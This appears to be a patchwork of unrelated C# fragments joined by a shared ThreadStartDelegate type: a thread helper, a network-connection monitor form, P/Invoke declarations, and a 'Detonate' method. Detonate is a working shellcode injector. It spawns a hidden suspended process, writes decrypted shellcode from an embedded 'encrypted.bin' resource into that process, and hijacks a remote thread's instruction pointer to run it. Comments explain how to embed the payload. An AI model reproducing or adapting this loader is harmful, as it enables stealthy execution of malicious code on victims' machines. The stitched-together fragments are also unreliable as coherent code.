private int CreateThreadInternal(ThreadStartDelegate runFunc, IntPtr startData) { int threadID; Thread thread; lock (m_threads) { threadID = GenerateThreadID(); thread = new Thread(new ParameterizedThreadStart(start => runFunc((IntPtr)start))); m_threads[threadID] = thread; } thread.Start(startData); return(threadID); }
/// <summary> /// 线程方法 /// </summary> private void ThreadStart() { var tcpCountInt = 0; var udpCountInt = 0; if (allCount.InvokeRequired || tcpCount.InvokeRequired || udpCount.InvokeRequired || pidInfoData.InvokeRequired) { ThreadStartDelegate delegateMe = ThreadStart; pidInfoData.Invoke(delegateMe); } else { var tcpResult = NetProcessAPI.GetAllTcpConnections(); var udpResult = NetProcessAPI.GetAllUdpConnections(); foreach (var pid in tcpResult) { if (pid.owningPid > 0) { tcpCountInt++; var pid_icon = ProcessAPI.GetIcon(pid.owningPid, true); var pid_name = ProcessAPI.GetProcessNameByPID(pid.owningPid); pidInfoData.Rows.Add(pid_icon, pid_name, pid.owningPid.ToString(), "TCP", pid.LocalAddress.ToString(), pid.LocalPort.ToString(), pid.RemoteAddress.ToString(), pid.RemotePort.ToString()); } } foreach (var pid in udpResult) { if (pid.owningPid > 0) { udpCountInt++; var pid_icon = ProcessAPI.GetIcon(pid.owningPid, true); var pid_name = ProcessAPI.GetProcessNameByPID(pid.owningPid); pidInfoData.Rows.Add(pid_icon, pid_name, pid.owningPid.ToString(), "UDP", pid.LocalAddress.ToString(), pid.LocalPort.ToString(), "", ""); } } tcpCount.Text = tcpCountInt.ToString(); udpCount.Text = udpCountInt.ToString(); allCount.Text = (tcpCountInt + udpCountInt).ToString(); start_btn.Enabled = true; } }
static extern IntPtr CreateRemoteThread( IntPtr hProcess, IntPtr lpThreadAttributes, uint dwStackSize, ThreadStartDelegate lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
static internal int CreateThread(IntPtr threadServiceHandle, ThreadStartDelegate runFunc, IntPtr startData) { var threadService = threadServiceHandle.NativeHandleToObject <ThreadService>(); return(threadService.CreateThreadInternal(runFunc, startData)); }
static void Detonate() { bool retValue; string binPath = GetValidExecutable(); PROCESS_INFORMATION pInfo = new PROCESS_INFORMATION(); STARTUPINFO sInfo = new STARTUPINFO(); SECURITY_ATTRIBUTES pSec = new SECURITY_ATTRIBUTES(); SECURITY_ATTRIBUTES tSec = new SECURITY_ATTRIBUTES(); pSec.nLength = Marshal.SizeOf(pSec); tSec.nLength = Marshal.SizeOf(tSec); const uint CREATE_SUSPENDED = 0x00000004; const uint CREATE_NO_WINDOW = 0x08000000; //MessageBox.Show("binPath: " + binPath); retValue = CreateProcess( binPath, null, ref pSec, ref tSec, false, CREATE_NO_WINDOW | CREATE_SUSPENDED, IntPtr.Zero, null, ref sInfo, out pInfo); // You NEED to add as a resource the encyrpted shellcode. // You can do this by going to Project -> Properties -> Resources // Then add a new file, then select the encrypted.bin (you'll need to // ensure that all files are viewable to add, not just text). // The, on the right side in solution explorer, click the encrypted.bin // file and ensure the build action is set to "Embedded Resource". uint rawDataLength = (uint)Runner.Properties.Resources.encrypted.Length; IntPtr hProc = OpenProcess(ProcessAccessFlags.All, false, pInfo.dwProcessId); //MessageBox.Show("Opened process."); IntPtr pRemoteThread = VirtualAllocEx( hProc, IntPtr.Zero, rawDataLength, AllocationType.Commit | AllocationType.Reserve, MemoryProtection.ReadWrite); //MessageBox.Show("Allocated space"); Random rnd = new Random(); int SIZE_MOD = rnd.Next(100, 501); int totalBytesWritten = 0; //MessageBox.Show("Beginning deryption"); // All at once byte[] decBytes = GetAllDecryptedBytes(); IntPtr bytesWritten = IntPtr.Zero; WriteProcessMemory(hProc, pRemoteThread, decBytes, decBytes.Length, out bytesWritten); IntPtr kernel32Addr = LoadLibrary("kernel32.dll"); IntPtr loadLibraryAddr = GetProcAddress(kernel32Addr, "LoadLibraryA"); if (loadLibraryAddr == null) { Console.WriteLine("Couldn't get proc address for kern32 loadlibraryaddr"); Environment.Exit(1); } //MessageBox.Show("Kernel 32 Addr loaded"); uint oldProtect = 0; bool reportected = VirtualProtectEx(hProc, pRemoteThread, rawDataLength, MemoryProtection.ExecuteRead, out oldProtect); if (reportected) { //MessageBox.Show("Was able to reportect"); ThreadStartDelegate funcdelegate = (ThreadStartDelegate)Marshal.GetDelegateForFunctionPointer(loadLibraryAddr, typeof(ThreadStartDelegate)); IntPtr hThread = CreateRemoteThread(hProc, IntPtr.Zero, 0, funcdelegate, IntPtr.Zero, 0x00000004, IntPtr.Zero); if (hThread == null) { Console.WriteLine("Couldn't create remote thread"); Environment.Exit(1); } //MessageBox.Show("Created remote thread"); CONTEXT64 ctx = new CONTEXT64(); ctx.ContextFlags = CONTEXT_FLAGS.CONTEXT_CONTROL; GetThreadContext(hThread, ref ctx); ctx.Rip = (UInt64)pRemoteThread; SetThreadContext(hThread, ref ctx); ResumeThread(hThread); CloseHandle(hThread); //MessageBox.Show("done"); } }
static extern IntPtr CreateRemoteThread(IntPtr hProcess, IntPtr lpThreadAttributes, uint dwStackSize, ThreadStartDelegate lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);
static internal int CreateThread(ThreadStartDelegate runFunc, IntPtr startData) { return(ms_instance.CreateThreadInternal(runFunc, startData)); }